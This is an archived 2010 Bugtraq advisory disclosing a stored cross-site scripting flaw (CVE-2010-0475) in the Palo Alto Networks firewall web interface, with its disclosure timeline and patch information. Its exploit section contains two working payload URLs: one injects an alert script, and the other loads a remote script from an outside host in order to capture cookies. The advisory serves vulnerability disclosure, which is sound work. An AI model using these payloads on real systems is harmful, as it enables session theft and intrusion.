lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20100512163426.20809.qmail@securityfocus.com>
Date: 12 May 2010 16:34:26 -0000
From: jeromie@...secinc.com
To: bugtraq@...urityfocus.com
Subject: Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)

Class: 		Cross-Site Scripting (XSS) Vulnerability
CVE: 	CVE-2010-0475
Remote: Yes 
Local: 	Yes 
Published: May 11, 2010 08:30AM
Timeline:Submission to MITRE: 1/18/2010
Vendor Contact: 2/18/2010
Vendor Response:  2/18/2010
Patch Available:  5/2010  Patched in maintenance releases (3.1.1 & 3.0.9)
Credit: Jeromie Jackson CISSP, CISM
	COBIT & ITIL Certified
	President- San Diego Open Web Application Security Project (OWASP)
	Vice President- San Diego Information Audit & Control Association (ISACA)
	SANS Mentor
	LinkedIn: www.linkedin.com/in/securityassessment
	Blog: www.JeromieJackson.com
	Twitter: www.twitter.com/Security_Sifu
 
Validated Vulnerable: 	
   Latest Version Per December 31, 2009

Discussion: 

A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface.  By crafting a URL that includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or other nefarious activity.  


Exploit: 
Single Line working-  https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT>alert("0wn3d")</SCRIPT>

&admin-role=%5Bobject+Object%5D&bSubmit=O



WORKING FOR REDIRECT TO LOAD cookies into URL.

https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT/XSS SRC="http://www.jeromiejackson.com/tryme.js"></SCRIPT>&admin-role=%5Bobject+Object%5D&bSubmit=O


Solution: 
A patch will be required from the vendor.  It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other such occurrences within the application. 

References:
OWASP Cross-Site Scripting (XSS) Attack Discussion
Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ